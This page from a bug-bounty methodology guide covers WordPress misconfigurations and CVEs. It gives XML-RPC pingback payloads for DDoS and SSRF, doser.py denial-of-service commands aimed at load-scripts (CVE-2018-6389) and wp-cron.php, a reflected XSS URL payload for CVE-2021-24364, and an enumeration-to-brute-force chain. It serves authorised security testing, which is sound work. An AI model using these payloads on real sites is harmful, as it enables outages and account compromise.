🕵️
HowToHunt
  • HowToHunt.md
  • API Testing
    • Hidden API Functionality Exposure
    • Reverse Engineer an API
  • Account Takeover Methodology
    • Account Takeover Methodology
  • Application Level DoS
    • Application Level DoS Methods
  • Authentication Bypass
    • 2FA Bypasses
    • OTP Bypass
    • Account Ban Bypass
  • Broken-Link Hijacking
    • Broken-Link Hijacking
  • Broken Auth And Session Management
    • Session Based Bugs
  • CMS
    • AEM
    • Drupal
    • Wordpress
    • Moodle
  • CORS
    • CORS
    • CORS Bypasses
  • CSRF
    • CSRF
    • CSRF MindMap
    • CSRF Bypass
  • Finding CVEs
    • CVES
  • CheckList
    • Web Application Pentesting Checklist
    • Web Checklist by Chintan Gurjar.pdf
    • Web Checklist by Tushra Verma.pdf
    • Mindmap by Rohit Gautam
    • Mindmap by Cristian Cornea
  • Web Page Source Code Review
    • Web Page Code Review Tips
  • EXIF Geo Data Not Stripped
    • EXIF Geo Data Not Stripped
  • File Upload Bypass
    • File Upload Bypass
  • Find Origin IP
    • Find Origin
  • GraphQL
    • GraphQL
  • HTTP Desync Attack
    • HTTP_Desync
  • Host-Header Attack
    • Host-Header
  • HTML-Injection
    • HTML-Injection
  • IDOR
    • IDOR
  • JWT ATTACK
    • JWT
  • JIRA ATTACK
    • JIRA
  • MFA Bypass
    • MFA Bypasses
    • 2FA-Bypass
  • Misconfigurations
    • Default Credential And Admin Panel
    • Docker
    • S3 Bucket
  • OAuth
    • OAuth
    • OAuth Hunting
  • Open Redirection
    • Find OpenRedirect Trick
    • Open Redirection Bypass
  • Parameter Pollution
    • Parameter Pollution In Social Sharing Buttons
  • Password Reset Functionality
    • MindMap
    • Password Reset Token Leakage
    • Account_Takeover_By_Password_Reset_Functionality
    • Password_Reset_Flaws
  • Rate Limit
    • Rate Limit Flaws
    • Rate-Limit Bypass
    • No Rate-Limit on Verify-PhoneNo
    • No Rate-limit on Invite User
    • No Rate-limit on Promo
    • No Rate-limit on Verify-email
    • No Rate-limit on forget-password
  • Race Condition
    • Race Condition
  • Recon
    • Github
    • Recon Workflow
    • Subdomain Enumeration
  • SQLi
    • SQL Injection.md
  • SAML
    • SAML
  • SSRF
    • SSRF
    • Blind SSRF
  • SSTI
    • SSTI
  • Sign Up Functionality
    • Sign Up Bugs
    • Sign Up MindMap
  • Sensitive Info Leaks
    • Github Recon Method
    • Github-Dorks
    • Github Dorks All
    • Google Dorks
    • Shodan CVE Dorks
    • Version Leaks
  • Status Code Bypass
    • Status_Code_Bypass Tips
    • 403 Bypass
  • Subdomain Takeover
    • Subdomain Takeover - Detail Method
    • Subdomain Takeover - Easy Method
    • Subs or Top level Domain
  • Tabnabbing
    • Tabnabbing
  • WAF Bypasses
    • WAF Bypass Using Headers
  • Weak Password Policy
    • Weak Password Policy
  • XSS
    • XSS
    • Bypass CSP
    • XSS Bypass
    • Automated XSS
    • Post Message Xss
  • XXE
    • XXE Methods
    • Billion Laugh Attack
Powered by GitBook
On this page
  • Wordpress Common Misconfiguration
  • Index
  • Wordpress Detection
  • Geneal Scan Tool
  • xmlrpc.php
  • Directory listing
  • CVE-2018-6389
  • CVE-2021-24364
  • WP Cornjob DOS
  • WP User Enumeration
  • Researcher Note
  • Author
  1. CMS

Wordpress

Wordpress Common Misconfiguration

Here I will try my best to mention all common security misconfigurations for Wordpress I saw before or officially referenced. I will be attaching all poc and reference as well

Index

  • Wordpress Detection

  • General Scan Tool

  • xmlrpc.php

  • Directory listing

  • CVE-2018-6389

  • CVE-2021-24364

  • WP Cornjob DOS

  • WP User Enumeration

Wordpress Detection

Well, if you are reading this you already know about technology detection tool and methods. Still adding them below

  • Wappalyzer

  • WhatRuns

  • BuildWith

Geneal Scan Tool

  • WpScan

xmlrpc.php

This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well.

Detection

  • visit site.com/xmlrpc.php

  • Get the error message about POST request only

Exploit

  • Intercept the request and change the method GET to POST

  • List all Methods

    <methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

  • Check the pingback.ping mentod is there or not

  • Perform DDOS

    <methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

  • Perform SSRF (Internal PORT scan only)

    <methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

Tool To Automate XMLRPC-Scan.

References

Directory listing

Sometimes developers forget to disable the directory listing on /wp-content/uploads. So this is the common issue on wordpress sites.

Detection

/wp-content/uploads

Pro tip

Add this path to your fuzzing wordlist

References

CVE-2018-6389

This issue can down any Wordpress site under 4.9.3 So while reporting make sure that your target website is running wordpress under 4.9.3

Detection

Use the URL from my gist called loadsxploit, you will get a massive js data in response.

Exploit

You can use any Dos tool i found Doser really fast and it shut down the webserver within 30 second

python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit'

References

CVE-2021-24364

The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.

Detection and Exploit

  • Replace <Your_WP-Site-here> to your WP-site <Your_WP-Site-here>/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D

  • Wait for the pop-up!

Reference

WP Cornjob DOS

This is another area where you can perform a DOS attack.

Detection

  • visit site.com/wp-cron.php

  • You will see a Blank page with 200 HTTP status code

Exploit

You can use the same tool Doser for exploiting this

python3 doser.py -t 999 -g 'https://site.com/wp-cron.php'

Reference

WP User Enumeration

This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff

Detection

  • visit site.com/wp-json/wp/v2/users/

  • You will see json data with user info in response

Exploit

If you have xmlrpc.php and this User enumeration both presence there. Then you can chain them out by collecting username from wp-json and perform Bruteforce on them via xmlrpc.php. It will surely show some extra effort and increase the impact as well

Reference

Researcher Note

Please do not depend on those issues at all. I saw people only looking for those issues and nothing else. Those are good to have a look while testing for other vulnerabilities and most of the time they work good for chaining with other low bugs.

Author

Name: Mehedi Hasan Remon

PreviousDrupalNextMoodle

Last updated 3 years ago

Handle:

XMLRPC-Scan
Bug Bounty Cheat Sheet
Medium Writeup
WpEngine Blog Post
H1 Report
H1 Report
H1 Report
H1 Report
loadsxploit
Doser
H1 Report
CVE Details
Blog Post
NVD
GitHub Issue
Medium Writeup
H1 Report
@remonsec